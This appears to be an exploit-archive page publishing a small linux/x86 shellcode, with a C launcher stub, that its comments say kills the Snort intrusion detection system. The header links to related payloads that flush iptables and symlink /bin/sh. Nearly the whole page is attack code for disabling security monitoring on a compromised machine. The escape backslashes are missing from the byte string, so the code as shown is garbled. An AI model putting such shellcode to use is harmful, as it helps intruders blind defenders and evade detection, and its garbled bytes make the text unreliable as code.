[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 kill snort 151 bytes
# Published : 2004-09-26
# Author : nob0dy
# Previous Title : linux/x86 symlink . /bin/sh 32 bytes
# Next Title : linux/x86 iptables -F 45 bytes


/*
 * x86 linux "snort IDS" shutter shellcode
 * size 151
 *
 * By nob0dy // find your own reality /
 *
 */

char snort_shutter_shellcode[] =
 "xebx03x5exebx05xe8xf8xffxff"
 "xffx83xc6x0dx31xc9xb1x80x80"
 "x36x01x46xe2xfaxeax18x2ex74"
 "x72x73x2ex63x68x6fx2ex71x6a"
 "x68x6dx6dx01x2cx31x38x01x72"
 "x6fx6ex73x75x01x80xedx66x2a"
 "x01x01xeax0cx91x91x91x91x91"
 "x91x91x91x91x91x91x91x91x54"
 "x88xe4x57x52x82xedx11xe9x01"
 "x01x01x01x5ax80xc2xcax11x01"
 "x01x30xd3xc6x44xf5x01x01x01"
 "x01x8cx82x08xeexfexfex8cxb2"
 "xfbxefxfexfex88x44xedx8cx82"
 "x0cxeexfexfex88x44xf1xb9x0a"
 "x01x01x01x88x74xe9x8cx4cxe9"
 "x52x88xf2xccx81x82xc5x11x5a"
 "x5fx5cxc2x91x91x91x91";

int main()
{
 void(* shutdown_snort)() = (void *)snort_shutter_shellcode ;
 shutdown_snort() ;
}

// www.Syue.com [2004-09-26]